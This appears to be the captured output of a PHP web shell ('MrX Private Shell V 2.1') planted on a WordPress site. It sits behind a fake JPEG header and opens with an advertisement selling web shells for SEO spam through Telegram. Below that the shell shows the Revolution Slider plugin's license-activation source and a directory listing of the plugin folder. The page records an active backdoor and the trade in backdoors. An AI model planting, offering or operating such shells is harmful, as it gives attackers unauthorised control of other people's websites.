����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @author ThemePunch <info@themepunch.com>
* @link https://www.themepunch.com/
* @copyright 2020 ThemePunch
* @since 6.2.0
*/
if(!defined('ABSPATH')) exit();
class RevSliderLicense extends RevSliderFunctions {
/**
* Activate the Plugin through the ThemePunch Servers
* @before 6.0.0: RevSliderOperations::checkPurchaseVerification();
* @before 6.2.0: RevSliderAdmin::activate_plugin();
**/
public function activate_plugin($code){
$rslb = new RevSliderLoadBalancer();
$data = array('code' => urlencode($code), 'version' => urlencode(RS_REVISION), 'product' => urlencode(RS_PLUGIN_SLUG));
$response = $rslb->call_url('activate.php', $data, 'updates');
$version_info = wp_remote_retrieve_body($response);
if(is_wp_error($version_info)) return false;
if($version_info == 'valid'){
update_option('revslider-valid', 'true');
update_option('revslider-code', $code);
return true;
}elseif($version_info == 'exist'){
return 'exist';
}elseif($version_info == 'banned'){
return 'banned';
}
return false;
}
/**
* Deactivate the Plugin through the ThemePunch Servers
* @before 6.0.0: RevSliderOperations::doPurchaseDeactivation();
* @before 6.2.0: RevSliderAdmin::deactivate_plugin();
**/
public function deactivate_plugin(){
$rslb = new RevSliderLoadBalancer();
$code = get_option('revslider-code', '');
$data = array('code' => urlencode($code), 'product' => urlencode(RS_PLUGIN_SLUG));
$res = $rslb->call_url('deactivate.php', $data, 'updates');
$vi = wp_remote_retrieve_body($res);
if(is_wp_error($vi)) return false;
if($vi == 'valid'){
update_option('revslider-valid', 'false');
update_option('revslider-code', '');
return true;
}
return false;
}
}
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| shortcode_generator | Folder | 0755 |
|
|
| addons.class.php | File | 6.7 KB | 0644 |
|
| debug.php | File | 2.91 KB | 0644 |
|
| export-html.class.php | File | 25.96 KB | 0644 |
|
| export.class.php | File | 28.35 KB | 0644 |
|
| folder.class.php | File | 4.32 KB | 0644 |
|
| functions-admin.class.php | File | 58.73 KB | 0644 |
|
| help.class.php | File | 551.06 KB | 0644 |
|
| import.class.php | File | 74.81 KB | 0644 |
|
| license.class.php | File | 1.81 KB | 0644 |
|
| loadbalancer.class.php | File | 3.26 KB | 0644 |
|
| newsletter.class.php | File | 1.78 KB | 0644 |
|
| plugin-update.class.php | File | 359.41 KB | 0644 |
|
| template.class.php | File | 31.97 KB | 0644 |
|
| tooltips.class.php | File | 32.55 KB | 0644 |
|
| widget.class.php | File | 4.76 KB | 0644 |
|